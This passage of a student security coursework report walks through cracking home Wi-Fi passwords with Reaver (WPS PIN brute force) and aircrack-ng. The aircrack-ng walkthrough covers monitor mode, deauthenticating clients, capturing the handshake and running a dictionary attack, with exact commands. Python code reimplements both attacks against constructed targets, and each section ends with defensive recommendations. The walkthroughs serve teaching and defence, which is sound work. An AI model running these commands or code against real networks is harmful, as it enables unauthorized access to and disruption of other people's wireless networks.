To protect the internal wired network from threats coming from the wireless side, a wireless DMZ isolated from the LAN is needed, meaning a firewall between the wireless network and the LAN. A wireless client that needs access to the internal network must first authenticate, with a RAS (Remote Access Service) server or through a VPN (Virtual Private Network).

4. Control the wireless signal.

An access point normally has a certain range. Some models have a detachable antenna connector; an access point with such a connector is more flexible because the antenna can be replaced as needed. A good antenna gives wider and more focused coverage.

Several antenna types exist that are designed to cover a particular area. The security aspect of this is using the antenna to limit the coverage of the wireless network, so that only areas within the intended range receive a signal.
This method is not easy, because you have to test at many points to make sure the wireless signal does not "leak" outside the desired area, but when it works it is very effective: if intruders receive no signal from the access point, they cannot attack it. A directional antenna radiates in a particular direction rather than in the circular pattern of the omnidirectional antennas usually supplied with a standard WAP. In addition, some WAPs allow the transmit power and direction to be set in the WAP configuration.

5. Security awareness

An attacker cannot obtain the password of the targeted network if the user understands social engineering. Being asked to re-enter the Wi-Fi password in a browser page after joining a network is highly suspicious, and that is exactly what the fake network does. It is very important for users to learn about data security and to raise their security awareness: the user is the last line of defence, and a user who cannot recognise the characteristics of the attack puts their data at risk.

2.10. References
Chaudhary, S., 2016. Hacking WPA/WPA2 without dictionary/bruteforce: Fluxion. [Online]
Available at: http://www.kalitutorials.net/2016/08/hacking-wpawpa-2-without.html
[Accessed 25 June 2017].
Kali Linux, n.d. What is Kali Linux?. [Online]
Available at: https://docs.kali.org/introduction/what-is-kali-linux
[Accessed 25 June 2017].
Sadmin, 2017. Capturing WPA Passwords by Targeting Users with a Fluxion Attack. [Online]
Available at: https://null-byte.wonderhowto.com/how-to/hack-wi-fi-capturing-wpa-passwords-by-targeting-users-with-fluxion-attack-0176134/
[Accessed 25 June 2017].
vmware, n.d. What Is a Virtual Machine?. [Online]
Available at: https://pubs.vmware.com/vsphere-50/index.jsp?topic=%2Fcom.vmware.vsphere.vm_admin.doc_50%2FGUID-CEFF6D89-8C19-4143-8C26-4B6D6734D2CB.html
[Accessed 25 June 2017].

3. Cracking home router Wi-Fi password with Reaver (Anthony
Wibowo TP031822)
3.1. Introduction
The increasingly rapid development of wireless technology in the era of data communication has taken society through several stages of technological development at once. The first generation (1G) of wireless development was marked by analog systems with low speed and voice as the main service. Two examples of first-generation wireless technology are NMT (Nordic Mobile Telephone) and AMPS (Advanced Mobile Phone System).
The second generation (2G) brought commercial standards in digital format at low to medium speed; examples are GSM and IS-95 (cdmaOne). Before the third generation (3G), an intermediate generation 2.5G is often inserted: digital wireless data communication at higher speed (up to about 150 kbps). 2.5G technology consists of data-based services such as GPRS (General Packet Radio Service) and EDGE (Enhanced Data rates for GSM Evolution) in the GSM domain, and CDMA2000 1xRTT with its PDN (Packet Data Network) in the CDMA domain.
The next stage is the third generation, a high-speed digital generation capable of high-speed data transfer and multimedia applications, for broadband. Examples are W-CDMA (also known as UMTS) and CDMA2000 1xEV-DO.
The generation after 3G is 4G (fourth-generation technology). This term generally refers to the fourth-generation standard of mobile phone technology. Two candidate standards have been commercialised as 4G: WiMAX (in South Korea since 2006) and Long Term Evolution (LTE) (in Sweden since 2009).

3.2. Applications of Wireless Technology
Wireless technology is now widely developed and integrated all the way from peripheral hardware to software. Its functions are very diverse, ranging from data-sharing media to internet connectivity for computers, netbooks and mobile phones. Wireless technology carries telecommunication without cables or other physical media, using electromagnetic waves instead of wires. It keeps growing rapidly because we need means of telecommunication all the time, as evidenced by the number of mobile phone users and by wireless technology also being used for internet access.

Some examples of wireless technologies are:

 Infrared (IR): electromagnetic radiation with wavelengths longer than visible light but shorter than radio waves.
 Bluetooth: an industry specification for wireless personal area networks (PAN). Bluetooth connects devices and can be used to exchange information between them.
 Radio frequency (RF): the part of the electromagnetic spectrum in which electromagnetic waves can be generated by feeding alternating current to an antenna.
 Wireless personal area network (WPAN): generally has a maximum communication distance of only about 10 m, shorter than a Wireless Local Area Network (WLAN).
 Wireless LAN (802.11): a wireless network that uses radio frequencies for communication between computer devices and, ultimately, the access point. It is based on two-way radio transmission that typically works in the 2.4 GHz band (802.11b, 802.11g) or the 5 GHz band (802.11a). Most equipment is Wi-Fi certified, supports IEEE 802.11b or IEEE 802.11g, and offers several security levels such as WEP and/or WPA.

From the examples of wireless technology above, I will explain one of them, namely infrared. Infrared can be utilized in several areas, namely health, communications, spatial applications, and industry.

3.3. Wi-Fi Security in General

Network Data Encryption
Network security typically relies on encryption protocols. Encryption scrambles data sent over a network connection so that it is hidden from eavesdroppers while still allowing the receiving computer to decipher the messages properly. Many forms of encryption technology exist in the industry.
Network Authentication
Authentication technology verifies the identity of computer network devices and users. Operating systems such as Microsoft Windows and Apple OS X include built-in support for authentication based on username and password. The administrative front end of a network router also authenticates the administrator by requiring a separate login.
Ad Hoc Wi-Fi Network Security
Traditional Wi-Fi networks connect through a router or other wireless access point. Alternatively, Wi-Fi supports a mode called wireless ad hoc that allows devices to connect directly to each other in peer-to-peer fashion. Because there is no central connection point, the security of an ad hoc Wi-Fi connection tends to be low, and some experts suggest avoiding ad hoc Wi-Fi networks for this reason.
General Wi-Fi Security Standards
Most Wi-Fi devices, including computers, routers and telephones, support multiple security standards. The types of security available, and even their names, vary depending on the capabilities of a device.



3.4. Hypothesis
Based on my situation, I assume the setup below:
1) My router is a TP-Link unit with WPS enabled. WPS stands for Wi-Fi Protected Setup and is a wireless networking standard that tries to make connections between a router and wireless devices faster and easier (Digitalcitizen.com, 2014).
2) The router is protected by a password that clients must present to authenticate; the password is strong, with a length of 24 characters.
3) The attacker machine is a notebook.
4) The attack environment is the Kali Linux operating system running in a virtual machine. Under this kind of environment we cause no side effects on my original working system, and Kali Linux is well suited to hacking jobs.
5) The hacking application is Reaver. Reaver implements a brute force attack against Wi-Fi Protected Setup (WPS); it has been designed to be a robust and practical attack against WPS and has been tested against a wide variety of access points and WPS implementations (Kali, 2014).

3.5. Tools
Hardware
 Asus A46C
- Intel® Core™ i5-3317U
- 4GB RAM, 500GB HDD
- NVIDIA® GeForce GT 635M (2GB VRAM)
 Ralink RT2870
- 802.11abgn Long-Range USB Adapter;
- Dual-Band 2.4GHz / 5GHz;
- Speed up to 150Mbps
 TP-Link Router – WR886N
-Dual-Band 2.4GHz/5GHz
-Speed up to 450Mbps



Software
 Windows 10
 VMWare Workstation 12.0
 Kali Linux 64Bit
 Reaver

3.6. Test Plan

Aim
Use an existing tool (Reaver in Kali Linux) to carry out Wi-Fi password cracking successfully from a virtual machine running Kali Linux.
Objective
1) To find out how Reaver works by using it to exploit the WPS vulnerability of a Wi-Fi network;
2) To find out how to prevent this kind of Wi-Fi cracking under the existing Wi-Fi security strategy;

3.7. Demonstration

1. Start Kali Linux and open a terminal window.

2. Run the command "airmon-ng" to see whether Kali recognizes your wireless USB adapter. It should show "wlan0" along with the chipset; if it does not, some troubleshooting will have to be done until it does.

3. Once the wireless USB adapter is working it needs to be put into monitor mode. To do this, run the command "airmon-ng start wlan0".

4. Then make a new folder: mkdir /etc/reaver

5. Type "wash -i mon0 -C" to list the access points in range that have WPS enabled. The "WPS Locked" column shows access points that have locked WPS after too many failed attempts; against those the attack will not progress.

6. Copy the BSSID of the target, to paste it when needed later, then press CTRL+C to stop the terminal window that is using the wireless USB adapter.

Now we can get to using Reaver. Be sure the terminal window running the "wash" command is no longer using the wireless USB adapter by pressing CTRL+C inside it. You can copy and paste the BSSID.
7. Open a new terminal and run the following command:
reaver -i mon0 -b <target BSSID> -vv

8. Reaver should start running.

Reaver starts to brute force the WPS PIN; this can take a long time, and in this case it took about 8 hours to recover the password. Below is the screenshot of the password.
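Why the PIN brute force above finishes in hours rather than years is worth seeing in code. The following is an added illustration, not code from the report or from Reaver: the "registrar" is a constructed stand-in for the access point that answers the way the WPS protocol leaks information (a wrong first half of the PIN is rejected before the second half is ever checked, and the eighth digit is a checksum), so the halves can be guessed independently and the whole space is at most 10,000 + 1,000 attempts. The lockout threshold is a hypothetical parameter; real access points differ, and wash reports the state in its "WPS Locked" column.

```python
"""Why a WPS PIN brute force needs at most about 11,000 guesses, not 10^8.

Added illustration; not code from the report or from Reaver.  MockRegistrar is a
constructed stand-in for the AP's WPS registrar: it only evaluates the second
half of the PIN after the first half was accepted (NACK after M4 in the real
exchange).  lockout_after is hypothetical; real access points differ.
"""
from typing import Optional, Tuple


def wps_pin_checksum(first7: int) -> int:
    """Checksum digit that the WPS specification appends to the 7 PIN digits."""
    accum = 0
    n = first7
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True when the 8th digit is the correct checksum of the first seven."""
    return (len(pin) == 8 and pin.isdigit()
            and int(pin[7]) == wps_pin_checksum(int(pin[:7])))


def worst_case_attempts() -> Tuple[int, int]:
    """(valid 8-digit PINs if guessed whole, attempts needed with the split + checksum)."""
    whole_space = 10 ** 7              # 8 digits, but the last one is a checksum
    split_space = 10 ** 4 + 10 ** 3    # first half, then second half minus its checksum
    return whole_space, split_space


class MockRegistrar:
    """Constructed stand-in for the AP's WPS registrar (not a protocol implementation)."""

    def __init__(self, pin: str, lockout_after: Optional[int] = None):
        if not is_valid_pin(pin):
            raise ValueError("PIN checksum invalid")
        self.pin = pin
        self.lockout_after = lockout_after   # hypothetical failure threshold
        self.failures = 0
        self.locked = False

    def try_pin(self, guess: str) -> Tuple[bool, bool]:
        """Return (first_half_ok, second_half_ok); raise once the AP has locked WPS."""
        if self.locked:
            raise RuntimeError("WPS locked")
        first_ok = guess[:4] == self.pin[:4]
        # The second half is only checked after the first half matched: the leak Reaver uses.
        second_ok = first_ok and guess[4:] == self.pin[4:]
        if not second_ok:
            self.failures += 1
            if self.lockout_after is not None and self.failures >= self.lockout_after:
                self.locked = True
        return first_ok, second_ok


def brute_force(ap: MockRegistrar) -> Tuple[Optional[str], int]:
    """Guess the PIN half by half; return (pin or None, number of completed attempts)."""
    attempts = 0
    first_half = None
    # Phase 1: 10^4 candidates for the first half; the second half is a placeholder.
    for i in range(10_000):
        try:
            first_ok, _ = ap.try_pin(f"{i:04d}0000")
        except RuntimeError:
            return None, attempts
        attempts += 1
        if first_ok:
            first_half = f"{i:04d}"
            break
    if first_half is None:
        return None, attempts
    # Phase 2: only 10^3 candidates, because the 8th digit is a checksum we can compute.
    for j in range(1_000):
        first7 = int(first_half + f"{j:03d}")
        guess = f"{first7:07d}{wps_pin_checksum(first7)}"
        try:
            _, second_ok = ap.try_pin(guess)
        except RuntimeError:
            return None, attempts
        attempts += 1
        if second_ok:
            return guess, attempts
    return None, attempts


if __name__ == "__main__":
    print(brute_force(MockRegistrar("48175425")))                   # constructed target PIN
    print(worst_case_attempts())
    print(brute_force(MockRegistrar("48175425", lockout_after=10)))  # AP locks WPS early
```

The attempt count returned for the constructed PIN 48175425 is 5,361, well inside the 11,000 worst case; the 8 hours reported above come from each attempt being a full WPS exchange over the air, not from the size of the search space. The lockout run shows the practical failure mode: an access point that locks WPS after a handful of failures stops the attack, which is what the "WPS Locked" column in wash output is telling you.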

3.8. Solution and Recommendation

The demonstration recovered the passphrase through the WPS PIN, so the length or complexity of the passphrase made no difference to the attack; the direct countermeasure is to disable WPS (at least its PIN method) on the router. The general password advice below still matters against dictionary and brute force attacks on the passphrase itself.

1. Avoid Creating a Common Password
The first rule is to avoid passwords that other people commonly use. Choosing a common password gives others a great opportunity to break into our personal account. What is an example of a common password? The default WordPress administrator name is "admin", so if you are a WordPress user, never use "admin" as the password. Another example: because you do not want to make a difficult password, you create an account password from the digits 1 to 9 only (123456789).

2. Do Not Use English Words

Is a password made of English words safe? It is not safe at all. Hackers attack an account password with the dictionary attack method, meaning they try words taken from an English word list. Avoid creating passwords from popular English phrases like ILoveYou, IMissYou, GoodBye, GoodMorning, Thankyou, and so on.

3. Create a Long Password
Long passwords are assumed to have a high level of security, so for a very strong account password make it long. The longer the password, the harder it is for hackers to break into your account. Make the password at least 8 characters, and 16 characters or more if possible, as long as you can still remember it.

4. Combine Digits, Letters, and Special Characters

To defeat the dictionary attack method when hackers try to break into your personal account, create a password from a combination of numbers, letters, and special characters. A password based on ordinary letters alone offers few combinations, because there are only 26 lowercase letters. It is different if you use all the printable characters on the keyboard, of which there are 95. You are free to create strong passwords if they mix numbers, letters, and special characters; a password like 586Mhhjk!@K8& will be very difficult for others to guess.

WIRELESS AND MOBILE SECURITY (CT094-3-3-WMSS) 68


3.9. References
Adones Pitogo - Blog. (2017). Hacking Wifi with Kali and Reaver. [online] Available at:
http://www.adonespitogo.com/articles/hacking-wifi-with-kali-and-reaver/ [Accessed 25 Jun.
2017].
Anon, (2017). [online] Available at: http://www.kalitutorials.net/2014/04/hack-wpawpa2-wps-
reaverkali-linux.html [Accessed 25 Jun. 2017].
Coding Security. (2017). Hacking wifi using reaver kali linux - Coding Security. [online]
Available at: https://codingsec.net/2016/04/hacking-wifi-using-reaver-kali-linux/ [Accessed
25 Jun. 2017].
PCMAG. (2017). 12 Ways to Secure Your Wi-Fi Network. [online] Available at:
http://www.pcmag.com/article2/0,2817,2409751,00.asp [Accessed 25 Jun. 2017].
Tools.kali.org. (2017). Reaver | Penetration Testing Tools. [online] Available at:
https://tools.kali.org/wireless-attacks/reaver [Accessed 25 Jun. 2017].



4. Cracking a Home Router Wi-Fi Password with a Dictionary Attack (Yanto
TP032242)
4.1. Introduction
One of the most popular and widely used telecommunications technologies is wireless. Wireless technology has the advantage of being simple and practical: people do not have to bother pulling network cable to a computer to enjoy internet access. Wireless technology is widely deployed in public places such as malls, airports, hotels, cafes, campuses, offices, public parks and even residential housing.

Aside from their simplicity and practicality, Wi-Fi networks have more weaknesses than wired networks. Many wireless service providers such as commercial hotspots, ISPs, internet cafes, campuses and offices have begun to use Wi-Fi on their networks, but very few are concerned about the security of data communication over the wireless network. This makes hackers interested in exploring their ability to perform various illegal activities, such as cracking the Wi-Fi password.

4.2. Hypothesis
According to occupytheweb (2016), WPA2-PSK has a weakness that lets an attacker capture the 4-way handshake while it is taking place. The 4-way handshake is performed when a client authenticates itself to the access point. The handshake does not carry the password itself, but it carries a message integrity code computed from a key derived from the password, and that is enough to test candidate passwords offline. Once the handshake is captured, the most common ways to crack the password are brute force or a dictionary attack. It is hypothesized here that the attacker is always able to obtain the password if the password is short or is a common one, and that the stronger the attacker's dictionary, the higher the chance of a successful attack.



4.3. Aim
The aim of this test is to check whether cracking the password with a dictionary attack can be done when the dictionary is strong.

4.4. Objectives
To capture the 4-way handshake between the client and the access point
To crack the captured handshake by using a dictionary attack

4.5. Test Plan

Task ID | Task Name | Objective | Expected Result
1 | Run the ifconfig command in Kali Linux | Check whether the external wireless card is connected | wlan0 is printed
2 | Run airmon-ng start wlan0 | Put the wireless card into monitor mode | wlan0 becomes wlan0mon
3 | Run airodump-ng wlan0mon | Monitor all transmission activity | Statistics about the transmissions are printed
4 | Run airodump-ng with the selected BSSID | Monitor the connected clients | Statistics about the clients are printed
5 | Run aireplay-ng --deauth | De-authenticate all clients so that they redo the 4-way handshake | Clients are disconnected, and the 4-way handshake is captured when they reconnect
6 | Run aircrack-ng on the .cap file and the dictionary file | Crack the password used for authentication | Password is printed

4.6. Crack Tool Used

Aircrack-ng (Aircrack-ng, 2017) is a tool used to assess a Wi-Fi network; it is mostly used for monitoring packets, vulnerability testing, and cracking. It lends itself to heavy scripting, which broadens its usage. It works primarily on Linux but can also be used on Windows and Mac OS. Aircrack-ng can sniff packets and capture the 4-way handshake, which is what this test needs.

It supports many monitoring modes and is able to sniff 802.11a, 802.11b and 802.11g. One of the main advantages of Aircrack-ng is that it has many features and is routinely used by professional penetration testers.

4.7. Tool comparison

Aircrack-ng | AirSnort
Active monitor (able to inject frames towards the access point) | Passive monitor
Highly used and optimized | Popular, but its usage rank is still below Aircrack-ng
Always updated, hence follows the latest technology | Has not been updated for 4 years
Source: (AlJaberi, 2016)



4.8. Hardware and Software
- TP-Link TL-WN722N as the Wireless Card
- Laptop
- VirtualBox with Kali Linux
- Airmon-ng, Airodump-ng, and Aircrack-ng
- Aircrack-ng Screenshot

4.9. Demonstration of Tool

1. Connect the external wireless card.
2. Start Kali Linux and check whether the card is recognized by issuing the command 'ifconfig'; if wlan0 is printed, the card is connected.

3. Start monitor mode by issuing the command airmon-ng start wlan0. If the tool reports processes that could cause trouble, kill them with the kill command.

4. Check whether monitor mode is active with the ifconfig command. The figure below shows that wlan0 has become wlan0mon, which means the wireless card is now in monitor mode.

5. Issue the command airodump-ng wlan0mon to monitor all surrounding traffic.

6. Start monitoring the target access point. Here the BSSID 70:62:B9:E6:30:6A is chosen as the victim. Issue the command:
airodump-ng --bssid 70:62:B9:E6:30:6A -c 7 --write crack wlan0mon

7. Open a new tab and de-authenticate the clients so that they perform a new handshake. De-auth by issuing the command:
aireplay-ng --deauth 100 -a 70:62:B9:E6:30:6A wlan0mon

8. After the handshake is captured, crack the capture file by issuing the command:
aircrack-ng crack-01.cap -w pass.txt
The figure below shows that the key is found and printed to the attacker.

WIRELESS AND MOBILE SECURITY (CT094-3-3-WMSS) 77


4.10. Evaluation
The test above shows that it is not that hard for an attacker to obtain the access point password. They just need a connected client, which is then kicked off the network. The tool then watches for the new connection and captures the handshake. Each candidate password from the dictionary file is turned into a key and checked against the handshake: the handshake's message integrity code is recomputed with that key and compared with the captured one. If a candidate matches, the tool prints the password to the attacker, who can then connect to the access point as an authenticated client.
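The check that aircrack-ng performs for every word in pass.txt can be written out in a few functions. The following is an added illustration, not code from the report or from aircrack-ng: the handshake is constructed inside the file so that it runs offline instead of reading crack-01.cap, but the key derivation is the one 802.11i specifies (PMK from PBKDF2-HMAC-SHA1 with 4096 rounds, PTK from the 802.11i PRF, EAPOL MIC keyed by the first 128 bits of the PTK). The station MAC, nonces, SSID and EAPOL bytes are made up; the BSSID is the one from the demonstration above.

```python
"""What the aircrack-ng step checks for every word in the dictionary.

Added illustration; not code from the report or from aircrack-ng.  The handshake
is constructed here (make_handshake) rather than read from a .cap file; the
station MAC, nonces, SSID and EAPOL bytes are made up, the BSSID is the one from
the demonstration.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol: bytes      # EAPOL-Key frame (message 2 of 4) with its MIC field zeroed
    mic: bytes        # MIC as captured
    version: int      # key descriptor version: 1 = TKIP (HMAC-MD5), 2 = CCMP (HMAC-SHA1)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 256 bits).

    The 4096 rounds are why each dictionary word costs real CPU time."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """The PTK binds the PMK to both MAC addresses and both nonces of this handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, version: int) -> bytes:
    """MIC over the EAPOL-Key frame (MIC field zeroed), keyed with the KCK."""
    if version == 1:
        return hmac.new(kck, eapol_mic_zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("key descriptor version not handled in this example")


def dictionary_attack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first passphrase whose derived KCK reproduces the captured MIC."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, hs.ssid)
        ptk = ptk_from_pmk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
        kck = ptk[:16]                      # KCK = first 128 bits of the PTK
        if hmac.compare_digest(eapol_mic(kck, hs.eapol, hs.version), hs.mic):
            return word
    return None


def make_handshake(passphrase: str, ssid: str = "HomeWiFi", version: int = 2) -> Handshake:
    """Constructed stand-in for what airodump-ng would have written to the .cap file."""
    ap_mac = bytes.fromhex("7062b9e6306a")           # BSSID from the demonstration
    sta_mac = bytes.fromhex("001122334455")          # made-up client MAC
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    # Made-up EAPOL-Key body: a few header bytes, the SNonce, then a zeroed 16-byte MIC field.
    eapol = b"\x01\x03\x00\x75\x02\x01\x0a" + snonce + b"\x00" * 16
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                       ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol, version)             # what the real client would send
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, mic, version)


if __name__ == "__main__":
    captured = make_handshake("correcthorsebattery")
    words = ["password", "12345678", "letmein1", "correcthorsebattery", "qwertyuiop"]
    print(dictionary_attack(captured, words))
```

Two things follow from the code that the steps above do not make visible. The handshake contains no password and no reversible form of it, only a MIC; a captured handshake therefore cannot be "decrypted", it can only be tested against guesses, one PBKDF2 derivation per guess. And because the PMK depends on the SSID as well as the passphrase, a precomputed table only helps against networks that share the SSID.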

4.11. Solution and Recommendation

The solution to the above problem is to use a long password that mixes character classes. It is good to have a password longer than 10 characters that contains at least one upper case letter, one lower case letter, one digit, and one symbol. Also avoid common English words, because the dictionary attack always guesses from names, numbers, and common English words. Usually a strong password makes the dictionary attack fail: even if the dictionary file is very large, gigabytes in size, it consumes as much time as a brute force attack, because every candidate must go through the same key derivation before it can be checked against the handshake. The network administrator is also recommended to change the wireless password periodically.



4.12. References
Aircrack-ng, 2017. Aircrack-ng. [Online]
Available at: https://www.aircrack-ng.org/
[Accessed 28 June 2017].
AlJaberi, Z., 2016. Top 20 Wireless hacking tools. [Online]
Available at: https://www.linkedin.com/pulse/top-20-wireless-hacking-tools-zayed-aljaberi
[Accessed 29 June 2017].
occupytheweb, 2016. Cracking WPA2-PSK Passwords Using Aircrack-Ng. [Online]
Available at: https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-
passwords-using-aircrack-ng-0148366/
[Accessed 29 June 2017].
